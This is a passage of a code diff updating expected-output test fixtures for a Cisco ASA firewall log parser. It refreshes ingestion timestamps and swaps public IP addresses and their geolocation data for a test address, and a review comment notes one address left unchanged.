 "severity": 6,
- "ingested": "2021-07-19T09:05:57.086539979Z",
+ "ingested": "2021-12-09T13:31:25.163026300Z",
 "original": "May 5 19:02:58 dev01: %ASA-6-106015: Deny TCP (no connection) from 192.168.2.2/24223 to 10.10.10.10/443 flags RST on interface fw111",
 "code": "106015",
 "kind": "event",
@@ -2380,8 +2357,8 @@
 },
 "event": {
 "severity": 6,
- "ingested": "2021-07-19T09:05:57.086541778Z",
- "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)",
+ "ingested": "2021-12-09T13:31:25.163033Z",
+ "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built director stub TCP connection for fw1111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)",
 "code": "302022",
 "kind": "event",
 "action": "firewall-rule",
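Review bot: In the `@@ -2380,8` hunk the new `event.original` still contains `(8.8.8.5/38540)` while the adjacent `8.8.8.8` was swapped for `81.2.69.144`; the same half-replacement is on the new side of `@@ -2454,8`, `@@ -2528,8`, `@@ -3028,8` and `@@ -3184,8`. If the intent is that no fixture carries a public address outside the supported subset, `8.8.8.5` needs the same treatment; if it was deliberately left because these stub-connection events never map that address into a field (their expected side changes only `ingested` and `original`), a sentence in the commit message saying so would keep the next sweep from re-opening the question. The enclosing event object of the `@@ -2380,8` hunk starts before its first context line.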
@@ -2454,8 +2431,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086543487Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:31:25.163038700Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built forwarder stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.168.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2528,8 +2505,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086545260Z", - "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (8.8.8.8/10051)", + "ingested": "2021-12-09T13:31:25.163043700Z", + "original": "May 5 19:02:58 dev01: %ASA-6-302022: Built backup stub TCP connection for fw111:10.10.10.10/38540 (8.8.8.5/38540) to net:192.1682.2.2/10051 (81.2.69.144/10051)", "code": "302022", "kind": "event", "action": "firewall-rule", @@ -2605,7 +2582,7 @@ "severity": 6, "duration": 0, "reason": "Cluster flow with CLU closed on owner", - "ingested": "2021-07-19T09:05:57.086546926Z", + "ingested": "2021-12-09T13:31:25.163049Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for fw111:10.10.10.10/39210 to net:192.168.2.2/10051 duration 0:00:00 forwarded bytes 0 Cluster flow with CLU closed on owner", "code": "302023", "kind": "event", 
@@ -2684,7 +2661,7 @@ "severity": 6, "duration": 0, "reason": "Forwarding or redirect flow removed to create director or backup flow", - "ingested": "2021-07-19T09:05:57.086548589Z", + "ingested": "2021-12-09T13:31:25.163053700Z", "original": "May 5 19:02:58 dev01: %ASA-6-302023: Teardown stub TCP connection for net:10.10.10.10/10051 to unknown:192.168.2.2/39222 duration 0:00:00 forwarded bytes 0 Forwarding or redirect flow removed to create director or backup flow", "code": "302023", "kind": "event", @@ -2735,7 +2712,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086550311Z", + "ingested": "2021-12-09T13:31:25.163059400Z", "original": "May 5 19:03:27 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list fw211111_access_out brief", "code": "111009", "kind": "event", @@ -2786,7 +2763,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086552061Z", + "ingested": "2021-12-09T13:31:25.163065900Z", "original": "May 5 19:02:26 dev01: %ASA-7-111009: User 'aaaa' executed cmd: show access-list aaa_out brief", "code": "111009", "kind": "event", @@ -2862,7 +2839,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086555023Z", + "ingested": "2021-12-09T13:31:25.163072400Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp ptaaac/192.168.2.2(62157) -\u003e fw111/10.10.10.10(3452) hit-cnt 1 first hit [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", @@ -2939,7 +2916,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086556858Z", + "ingested": "2021-12-09T13:31:25.163078900Z", "original": "May 5 19:02:26 dev01: %ASA-6-106100: access-list fw111_out permitted tcp net/192.168.2.2(49033) -\u003e fw111/10.10.10.10(6007) hit-cnt 2 300-second interval [0x38ff326b, 0x00000000]", "code": "106100", "kind": "event", 
@@ -2985,7 +2962,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086559272Z", + "ingested": "2021-12-09T13:31:25.163085500Z", "original": "May 5 19:02:26 dev01: %ASA-6-302027: Teardown stub ICMP connection for fw1111:10.10.10.10/6426 to net:192.168.2.2/0 duration 1:00:04 forwarded bytes 56 Cluster flow with CLU closed on owner", "code": "302027", "kind": "event", @@ -3028,8 +3005,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086564615Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (8.8.8.8)", + "ingested": "2021-12-09T13:31:25.163091900Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302026: Built director stub ICMP connection for fw111:10.10.10.10/32004 (8.8.8.5) to net:192.168.2.2/0 (81.2.69.144)", "code": "302026", "kind": "event", "action": "firewall-rule", @@ -3097,7 +3074,7 @@ }, "event": { "severity": 7, - "ingested": "2021-07-19T09:05:57.086566426Z", + "ingested": "2021-12-09T13:31:25.163098400Z", "original": "May 5 19:02:26 dev01: %ASA-7-710005: UDP request discarded from 10.10.10.10/1985 to net:192.168.2.2/1985", "code": "710005", "kind": "event", @@ -3141,7 +3118,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086568118Z", + "ingested": "2021-12-09T13:31:25.163104800Z", "original": "May 5 19:02:26 dev01: %ASA-6-302025: Teardown stub UDP connection for net:192.168.2.2/123 to unknown:10.10.10.10/123 duration 0:01:00 forwarded bytes 48 Cluster flow with CLU removed from due to idle timeout", "code": "302025", "kind": "event", 
@@ -3184,8 +3161,8 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086569821Z", - "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (8.8.8.8/123)", + "ingested": "2021-12-09T13:31:25.163111300Z", + "original": "May 5 19:02:26 dev01: %ASA-6-302024: Built backup stub UDP connection for net:192.168.2.2/9051 (8.8.8.5(19051) to fw111:10.10.10.10/123 (81.2.69.144/123)", "code": "302024", "kind": "event", "action": "firewall-rule", @@ -3256,7 +3233,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086571516Z", + "ingested": "2021-12-09T13:31:25.163117800Z", "original": "May 5 19:02:26 dev01: %ASA-3-106014: Deny inbound icmp src fw111:10.10.10.10 dst fw111:10.10.10.10(type 8, code 0)", "code": "106014", "kind": "event", @@ -3301,7 +3278,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086573238Z", + "ingested": "2021-12-09T13:31:25.163124200Z", "original": "May 5 19:02:25 dev01: %ASA-4-733100: [192.168.2.2] drop rate-1 exceeded. Current burst rate is 0 per second, max configured rate is -4; Current average rate is 7 per second, max configured rate is -4; Cumulative total count is 9063", "code": "733100", "kind": "event", @@ -3384,7 +3361,7 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086574972Z", + "ingested": "2021-12-09T13:31:25.163130700Z", "original": "May 5 19:02:25 dev01: %ASA-3-106010: Deny inbound sctp src fw111:10.10.10.10/5114 dst fw111:10.10.10.10/2", "code": "106010", "kind": "event", @@ -3460,7 +3437,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086576688Z", + "ingested": "2021-12-09T13:31:25.163137100Z", "original": "May 5 19:02:25 dev01: %ASA-4-507003: tcp flow from fw111:10.10.10.10/49574 to out111:192.168.2.2/80 terminated by inspection engine, reason - disconnected, dropped packet.", "code": "507003", "kind": "event", 
@@ -3523,7 +3500,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:05:57.086578574Z",
+ "ingested": "2021-12-09T13:31:25.163143800Z",
 "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL 10.20.30.40:http://10.20.30.40/",
 "code": "304001",
 "kind": "event",
@@ -3585,7 +3562,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:05:57.086580245Z",
+ "ingested": "2021-12-09T13:31:25.163150300Z",
 "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed URL someuser@10.20.30.40:http://10.20.30.40/IOFUHSIU98[0]",
 "code": "304001",
 "kind": "event",
@@ -3647,7 +3624,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:05:57.086581960Z",
+ "ingested": "2021-12-09T13:31:25.163155200Z",
 "original": "Apr 27 17:54:52 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL 10.20.30.40:http://10.20.30.40/some/longer/url-asd-er9789870[0]_=23",
 "code": "304001",
 "kind": "event",
@@ -3709,7 +3686,7 @@
 },
 "event": {
 "severity": 5,
- "ingested": "2021-07-19T09:05:57.086583658Z",
+ "ingested": "2021-12-09T13:31:25.163160400Z",
 "original": "Apr 27 04:18:49 dev01: %ASA-5-304001: 10.20.30.40 Accessed JAVA URL someuser@10.20.30.40:http://10.20.30.40/",
 "code": "304001",
 "kind": "event",
@@ -3734,42 +3711,48 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "FR-63", - "city_name": "Clermont-Ferrand", - "country_iso_code": "FR", - "country_name": "France", - "region_name": "Puy-de-Dôme", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 3.0966, - "lat": 45.7838 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 3215, + "number": 20712, "organization": { - "name": "Orange" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "2.3.4.5", + "address": "81.2.69.144", "port": 9101, - "ip": "2.3.4.5" + "ip": "81.2.69.144" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "RU-MOW", - "city_name": "Moscow", - "country_iso_code": "RU", - "country_name": "Russia", - "region_name": "Moscow", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": 37.6172, - "lat": 55.7527 + "lon": -1.3614, + "lat": 51.7095 + } + }, + "as": { + "number": 20712, + "organization": { + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "1.2.3.4", + "address": "81.2.69.144", "port": 54242, - "ip": "1.2.3.4" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -3804,8 +3787,7 @@ "dev01" ], "ip": [ - "1.2.3.4", - "2.3.4.5" + "81.2.69.144" ] }, "host": { 
@@ -3815,8 +3797,8 @@ "severity": 6, "duration": 3602000000000, "reason": "Connection timeout", - "ingested": "2021-07-19T09:05:57.086585355Z", - "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:1.2.3.4/54242 to server.deflan:2.3.4.5/9101 duration 1:00:02 bytes 245 Connection timeout", + "ingested": "2021-12-09T13:31:25.163166600Z", + "original": "Apr 27 04:12:23 dev01: %ASA-6-302304: Teardown TCP state-bypass connection 2751765169 from server.deflan:81.2.69.144/54242 to server.deflan:81.2.69.144/9101 duration 1:00:02 bytes 245 Connection timeout", "code": "302304", "kind": "event", "start": "2021-04-27T03:12:21.000Z", @@ -3893,7 +3875,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086587091Z", + "ingested": "2021-12-09T13:31:25.163172300Z", "original": "Apr 27 02:02:02 dev01: %ASA-4-106023: Deny tcp src outside:10.10.10.2/56444 dst srv:192.168.2.2/51635(testhostname.domain) by access-group \"global_access_1\"", "code": "106023", "kind": "event", @@ -3920,27 +3902,9 @@ "level": "notification" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "LV-RIX", - "city_name": "Riga", - "country_iso_code": "LV", - "country_name": "Latvia", - "region_name": "Riga", - "location": { - "lon": 24.0978, - "lat": 56.9496 - } - }, - "as": { - "number": 12578, - "organization": { - "name": "SIA Tet" - } - }, - "address": "195.122.12.242", "port": 53, - "ip": "195.122.12.242" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "port": 27218, @@ -3980,7 +3944,7 @@ "somedomainname.local" ], "ip": [ - "195.122.12.242" + "192.168.157.61" ] }, "host": { 
@@ -3988,8 +3952,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086595499Z", - "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/195.122.12.242(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", + "ingested": "2021-12-09T13:31:25.163176700Z", + "original": "Oct 20 2019 15:15:15 dev01: %ASA-5-106100: access-list testrulename denied tcp insideintf/somedomainname.local(27218) -\u003e OUTSIDE/192.168.157.61(53) hit-cnt 1 first hit [0x16847359, 0x00000000]", "code": "106100", "kind": "event", "action": "firewall-rule", @@ -4042,7 +4006,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086600770Z", + "ingested": "2021-12-09T13:31:25.163182Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111004: console end configuration: OK", "code": "111004", "kind": "event", @@ -4100,7 +4064,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086603139Z", + "ingested": "2021-12-09T13:31:25.163188600Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-111010: User 'enable_15', running 'CLI' from IP 10.10.0.87, executed 'clear'", "code": "111010", "kind": "event", @@ -4148,7 +4112,7 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086604910Z", + "ingested": "2021-12-09T13:31:25.163193300Z", "original": "Apr 27 02:03:03 dev01: %ASA-5-502103: User priv level changed: Uname: enable_15 From: 1 To: 15", "code": "502103", "kind": "event", @@ -4226,7 +4190,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086606694Z", + "ingested": "2021-12-09T13:31:25.163198100Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605004: Login denied from 10.10.1.212/51923 to FCD-FS-LAN:10.10.1.254/https for user \"*****\"", "code": "605004", "kind": "event", 
@@ -4286,7 +4250,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086608448Z", + "ingested": "2021-12-09T13:31:25.163202100Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611102: User authentication failed: IP address: 10.10.0.87, Uname: admin", "code": "611102", "kind": "event", @@ -4357,7 +4321,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086610181Z", + "ingested": "2021-12-09T13:31:25.163207200Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-605005: Login permitted from 10.10.0.87/6651 to FCD-FS-LAN:10.10.1.254/ssh for user \"admin\"", "code": "605005", "kind": "event", @@ -4417,7 +4381,7 @@ }, "event": { "severity": 6, - "ingested": "2021-07-19T09:05:57.086611905Z", + "ingested": "2021-12-09T13:31:25.163212600Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-611101: User authentication succeeded: IP address: 10.10.0.87, Uname: admin", "code": "611101", "kind": "event", @@ -4441,24 +4405,24 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", - "ip": "91.240.17.178" + "address": "81.2.69.144", + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4478,7 +4442,7 @@ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { 
@@ -4486,8 +4450,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086613585Z", - "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 91.240.17.178, IP = 91.240.17.178, Security negotiation complete for LAN-to-LAN Group (91.240.17.178) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", + "ingested": "2021-12-09T13:31:25.163218400Z", + "original": "Apr 27 02:03:03 dev01: %ASA-5-713049: Group = 81.2.69.144, IP = 81.2.69.144, Security negotiation complete for LAN-to-LAN Group (81.2.69.144) Responder, Inbound SPI = 0x276b1da2, Outbound SPI = 0x0e1a581d", "code": "713049", "kind": "event", "action": "firewall-rule", @@ -4509,29 +4473,29 @@ "destination": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "bytes": 1216163, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "source": { "user": { - "name": "91.240.17.178" + "name": "81.2.69.144" }, "bytes": 297103 }, @@ -4550,13 +4514,13 @@ }, "related": { "user": [ - "91.240.17.178" + "81.2.69.144" ], "hosts": [ "dev01" ], "ip": [ - "91.240.17.178" + "81.2.69.144" ] }, "host": { 
@@ -4565,8 +4529,8 @@ "event": { "severity": 4, "duration": 0, - "ingested": "2021-07-19T09:05:57.086615270Z", - "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 91.240.17.178, Username = 91.240.17.178, IP = 91.240.17.178, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", + "ingested": "2021-12-09T13:31:25.163225Z", + "original": "Apr 27 02:03:03 dev01: %ASA-4-113019: Group = 81.2.69.144, Username = 81.2.69.144, IP = 81.2.69.144, Session disconnected. Session Type: LAN-to-LAN, Duration: 0h:32m:16s, Bytes xmt: 297103, Bytes rcv: 1216163, Reason: User Requested", "code": "113019", "kind": "event", "start": "2021-04-27T02:03:03.000Z", @@ -4623,7 +4587,7 @@ }, "event": { "severity": 4, - "ingested": "2021-07-19T09:05:57.086616962Z", + "ingested": "2021-12-09T13:31:25.163231500Z", "original": "Apr 27 02:03:03 dev01: %ASA-4-722051: Group \u003cVPN5Policy\u003e User \u003cjohn\u003e IP \u003c192.168.50.3\u003e IPv4 Address \u003c192.168.50.5\u003e IPv6 address \u003c::\u003e assigned to session", "code": "722051", "kind": "event", @@ -4650,25 +4614,28 @@ }, "source": { "geo": { - "continent_name": "North America", - "country_name": "United States", + "continent_name": "Europe", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -97.822, - "lat": 37.751 - }, - "country_iso_code": "US" + "lon": -1.3614, + "lat": 51.7095 + } }, "as": { - "number": 15169, + "number": 20712, "organization": { - "name": "Google LLC" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "8.8.8.8", + "address": "81.2.69.144", "user": { "name": "testuser" }, - "ip": "8.8.8.8" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4691,7 +4658,7 @@ "dev01" ], "ip": [ - "8.8.8.8" + "81.2.69.144" ] }, "host": { 
@@ -4700,8 +4667,8 @@ "event": { "severity": 6, "reason": "User Requested", - "ingested": "2021-07-19T09:05:57.086618639Z", - "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 8.8.8.8 WebVPN session terminated: User Requested.", + "ingested": "2021-12-09T13:31:25.163236500Z", + "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User testuser IP 81.2.69.144 WebVPN session terminated: User Requested.", "code": "716002", "kind": "event", "action": "firewall-rule", @@ -4761,7 +4728,7 @@ "event": { "severity": 6, "reason": "Idle timeout", - "ingested": "2021-07-19T09:05:57.086620348Z", + "ingested": "2021-12-09T13:31:25.163241700Z", "original": "Apr 27 02:03:03 dev01: %ASA-6-716002: Group another-policy User alice IP 192.168.50.1 WebVPN session terminated: Idle timeout.", "code": "716002", "kind": "event", 
@@ -4786,50 +4753,32 @@ "level": "error" }, "destination": { - "geo": { - "continent_name": "Europe", - "region_iso_code": "GB-HCK", - "city_name": "Stoke Newington", - "country_iso_code": "GB", - "country_name": "United Kingdom", - "region_name": "Hackney", - "location": { - "lon": -0.0765, - "lat": 51.5638 - } - }, - "as": { - "number": 8468, - "organization": { - "name": "Entanet" - } - }, - "address": "195.74.114.34", "port": 23, - "ip": "195.74.114.34" + "address": "192.168.157.61", + "ip": "192.168.157.61" }, "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "IE-L", - "city_name": "Dublin", - "country_iso_code": "IE", - "country_name": "Ireland", - "region_name": "Leinster", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", + "country_iso_code": "GB", + "country_name": "United Kingdom", + "region_name": "Oxfordshire", "location": { - "lon": -6.2488, - "lat": 53.3338 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 8075, + "number": 20712, "organization": { - "name": "Microsoft Corporation" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "104.46.88.19", + "address": "81.2.69.144", "port": 6370, - "ip": "104.46.88.19" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4858,8 +4807,8 @@ "dev01" ], "ip": [ - "104.46.88.19", - "195.74.114.34" + "81.2.69.144", + "192.168.157.61" ] }, "host": { @@ -4867,8 +4816,8 @@ }, "event": { "severity": 3, - "ingested": "2021-07-19T09:05:57.086622029Z", - "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 104.46.88.19/6370 to outside:195.74.114.34/23", + "ingested": "2021-12-09T13:31:25.163248200Z", + "original": "Apr 27 02:03:03 dev01: %ASA-3-710003: TCP access denied by ACL from 81.2.69.144/6370 to outside:192.168.157.61/23", "code": "710003", "kind": "event", "action": "firewall-rule", 
@@ -4899,25 +4848,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -4950,7 +4899,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -4959,8 +4908,8 @@ }, "event": { "severity": 5, - "ingested": "2021-07-19T09:05:57.086623748Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:91.240.17.178/8888 to destinationInterfaceName:192.168.2.2/123123 locally", + "ingested": "2021-12-09T13:31:25.163253900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-5-434004: SFR requested ASA to bypass further packet redirection and process TCP flow from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/123123 locally", "code": "434004", "kind": "event", "action": "bypass", 
@@ -4992,25 +4941,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.138", + "address": "81.2.69.144", "port": 8888, - "ip": "91.240.17.138" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5043,7 +4992,7 @@ "dev01" ], "ip": [ - "91.240.17.138", + "81.2.69.144", "192.168.2.2" ] }, @@ -5053,8 +5002,8 @@ "event": { "severity": 4, "action": "drop", - "ingested": "2021-07-19T09:05:57.086625415Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:91.240.17.138/8888 to destinationInterfaceName:192.168.2.2/514514", + "ingested": "2021-12-09T13:31:25.163259500Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-434002: SFR requested to drop TCP packet from sourceInterfaceName:81.2.69.144/8888 to destinationInterfaceName:192.168.2.2/514514", "code": "434002", "outcome": "unknown" }, 
@@ -5077,25 +5026,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5123,7 +5072,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5133,8 +5082,8 @@ "event": { "severity": 6, "reason": "Failed to locate egress interface", - "ingested": "2021-07-19T09:05:57.086627143Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:91.240.17.178/7777 to 192.168.2.2/123412", + "ingested": "2021-12-09T13:31:25.163263900Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-6-110002: Failed to locate egress interface for TCP from sourceInterfaceName:81.2.69.144/7777 to 192.168.2.2/123412", "code": "110002", "kind": "event", "action": "firewall-rule", 
@@ -5165,25 +5114,25 @@ "source": { "geo": { "continent_name": "Europe", - "region_iso_code": "GB-ENG", - "city_name": "London", + "region_iso_code": "GB-OXF", + "city_name": "Abingdon", "country_iso_code": "GB", "country_name": "United Kingdom", - "region_name": "England", + "region_name": "Oxfordshire", "location": { - "lon": -0.0247, - "lat": 51.5888 + "lon": -1.3614, + "lat": 51.7095 } }, "as": { - "number": 201126, + "number": 20712, "organization": { - "name": "CDW Ltd" + "name": "Andrews \u0026 Arnold Ltd" } }, - "address": "91.240.17.178", + "address": "81.2.69.144", "port": 7777, - "ip": "91.240.17.178" + "ip": "81.2.69.144" }, "tags": [ "preserve_original_event" @@ -5216,7 +5165,7 @@ "dev01" ], "ip": [ - "91.240.17.178", + "81.2.69.144", "192.168.2.2" ] }, @@ -5226,8 +5175,8 @@ "event": { "severity": 4, "reason": "Duplicate TCP SYN with different initial sequence number", - "ingested": "2021-07-19T09:05:57.086628859Z", - "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:91.240.17.178/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", + "ingested": "2021-12-09T13:31:25.163269600Z", + "original": "Apr 27 2020 02:03:03 dev01: %ASA-4-419002: Duplicate TCP SYN from sourceInterfaceName:81.2.69.144/7777 to destinationInterfaceName:192.168.2.2/514514 with different initial sequence number", "code": "419002", "kind": "event", "action": "firewall-rule", 
